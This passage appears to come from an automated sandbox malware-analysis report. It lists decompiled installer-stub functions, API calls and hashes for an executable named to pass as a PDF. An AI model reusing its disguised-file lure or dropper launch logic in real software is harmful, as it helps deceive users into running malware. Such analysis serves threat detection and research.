                                                                      			E00405E16(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a584; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                      0x00405e1c
                                                                      0x00405e22
                                                                      0x00405e23
                                                                      0x00405e23
                                                                      0x00405e28
                                                                      0x00405e29
                                                                      0x00405e2c
                                                                      0x00405e31
                                                                      0x00405e34
                                                                      0x00405e3e
                                                                      0x00405e4b
                                                                      0x00405e4f
                                                                      0x00405e57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e5b
                                                                      0x00000000
                                                                      0x00405e5d
                                                                      0x00405e5d
                                                                      0x00405e5d
                                                                      0x00405e60
                                                                      0x00405e63
                                                                      0x00405e63
                                                                      0x00405e66
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405E34
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                                      Strings
                                                                      • nsa, xrefs: 00405E23
                                                                      • "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", xrefs: 00405E16
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-2680944872
                                                                      • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                      • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                                      • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                      • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E00402C93(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402C93(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004065EC(3);
					if(_t27 == 0) {
						if( *0x42a2f0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
				}
				return _t18;
			}








                                                                      0x00402cb4
                                                                      0x00402cbc
                                                                      0x00402ce4
                                                                      0x00402cce
                                                                      0x00402d1e
                                                                      0x00402d24
                                                                      0x00000000
                                                                      0x00402d26
                                                                      0x00402ce2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402ce2
                                                                      0x00402cf9
                                                                      0x00402d01
                                                                      0x00402d08
                                                                      0x00402d34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d3c
                                                                      0x00402d44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d44
                                                                      0x00000000
                                                                      0x00402d17
                                                                      0x00402d2b

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                                      • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                                      • Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                                      • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push("true"); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                      0x10001759
                                                                      0x10001759
                                                                      0x10001759
                                                                      0x10001763
                                                                      0x1000176b
                                                                      0x10001778
                                                                      0x10001786
                                                                      0x10001789
                                                                      0x1000178b
                                                                      0x10001790
                                                                      0x10001795
                                                                      0x100018a8
                                                                      0x100018a8
                                                                      0x1000179b
                                                                      0x1000179f
                                                                      0x100017a2
                                                                      0x100017a7
                                                                      0x100017a8
                                                                      0x100017a9
                                                                      0x100017af
                                                                      0x100017b5
                                                                      0x100017e5
                                                                      0x100017ec
                                                                      0x10001810
                                                                      0x1000184f
                                                                      0x10001812
                                                                      0x10001812
                                                                      0x10001813
                                                                      0x10001816
                                                                      0x1000181c
                                                                      0x10001820
                                                                      0x10001823
                                                                      0x10001828
                                                                      0x10001828
                                                                      0x1000182f
                                                                      0x10001835
                                                                      0x1000183b
                                                                      0x10001847
                                                                      0x10001848
                                                                      0x1000184b
                                                                      0x100017ee
                                                                      0x100017ef
                                                                      0x10001804
                                                                      0x10001804
                                                                      0x10001859
                                                                      0x1000185c
                                                                      0x10001869
                                                                      0x10001870
                                                                      0x10001878
                                                                      0x1000187b
                                                                      0x1000187b
                                                                      0x10001878
                                                                      0x10001888
                                                                      0x10001890
                                                                      0x10001895
                                                                      0x10001888
                                                                      0x1000189d
                                                                      0x00000000
                                                                      0x1000189f
                                                                      0x00000000
                                                                      0x100018a0
                                                                      0x1000189d
                                                                      0x100017b9
                                                                      0x100017bc
                                                                      0x100017da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100017dd
                                                                      0x100017e2
                                                                      0x100017e2
                                                                      0x100017e4
                                                                      0x00000000
                                                                      0x100017e4
                                                                      0x100017be
                                                                      0x100017bf
                                                                      0x100017c7
                                                                      0x100017c8
                                                                      0x00000000
                                                                      0x100017c8
                                                                      0x100017c1
                                                                      0x100017c2
                                                                      0x100017d0
                                                                      0x00000000
                                                                      0x100017d0
                                                                      0x100017c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100017c5

                                                                      APIs
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                      • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 59%
                                                                      			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C31(3);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C31(4);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C53(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C53(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t59 = E00402C53();
					_t32 = E00402C53();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C31();
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t41 = E00402C31(2);
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406159();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                      0x00401c19
                                                                      0x00401c1b
                                                                      0x00401c22
                                                                      0x00401c25
                                                                      0x00401c28
                                                                      0x00401c32
                                                                      0x00401c36
                                                                      0x00401c39
                                                                      0x00401c42
                                                                      0x00401c42
                                                                      0x00401c45
                                                                      0x00401c49
                                                                      0x00401c52
                                                                      0x00401c52
                                                                      0x00401c55
                                                                      0x00401c59
                                                                      0x00401c5b
                                                                      0x00401cb0
                                                                      0x00401cb2
                                                                      0x00401cbd
                                                                      0x00401cc7
                                                                      0x00401cca
                                                                      0x00401cca
                                                                      0x00401cd3
                                                                      0x00000000
                                                                      0x00401c5d
                                                                      0x00401c64
                                                                      0x00401c66
                                                                      0x00401c69
                                                                      0x00401c6f
                                                                      0x00401c76
                                                                      0x00401c79
                                                                      0x00401ca1
                                                                      0x00401cd9
                                                                      0x00401cd9
                                                                      0x00401c7b
                                                                      0x00401c89
                                                                      0x00401c91
                                                                      0x00401c94
                                                                      0x00401c94
                                                                      0x00401c79
                                                                      0x00401cdc
                                                                      0x00401cdf
                                                                      0x00401ce5
                                                                      0x00402a81
                                                                      0x00402a81
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                                      • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                                      • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                                      • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004060DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E004060DF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                                                      0x004060ef
                                                                      0x004060f1
                                                                      0x004060fe
                                                                      0x00406109
                                                                      0x00406111
                                                                      0x00406116
                                                                      0x0040612a
                                                                      0x00406132
                                                                      0x00406140
                                                                      0x00406140
                                                                      0x00406146
                                                                      0x0040614d
                                                                      0x00000000
                                                                      0x0040614d
                                                                      0x00406156

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406109
                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612A
                                                                      • RegCloseKey.KERNELBASE(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3677997916-1824292864
                                                                      • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                      • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                                      • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                      • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E00401ED5() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402C53(_t25);
				E00405371(0xffffffeb, _t14);
				_t16 = E004058F2(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x20)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406628(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 0x38);
						if( *((intOrPtr*)(_t32 - 0x24)) < _t25) {
							if( *(_t32 - 0x38) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00406159( *((intOrPtr*)(_t32 - 0xc)),  *(_t32 - 0x38));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}







                                                                      0x00401edb
                                                                      0x00401ee0
                                                                      0x00401ee6
                                                                      0x00401eed
                                                                      0x00401ef0
                                                                      0x004028a1
                                                                      0x00401ef6
                                                                      0x00401ef9
                                                                      0x00401f04
                                                                      0x00401f1b
                                                                      0x00401f0f
                                                                      0x00401f19
                                                                      0x00401f19
                                                                      0x00401f26
                                                                      0x00401f2f
                                                                      0x00401f41
                                                                      0x00401f43
                                                                      0x00401f43
                                                                      0x00401f31
                                                                      0x00401f37
                                                                      0x00401f37
                                                                      0x00401f2f
                                                                      0x00401f4a
                                                                      0x00401f4d
                                                                      0x00401f4d
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                        • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00402EAD), ref: 004053CC
                                                                        • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll), ref: 004053DE
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                        • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                                        • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
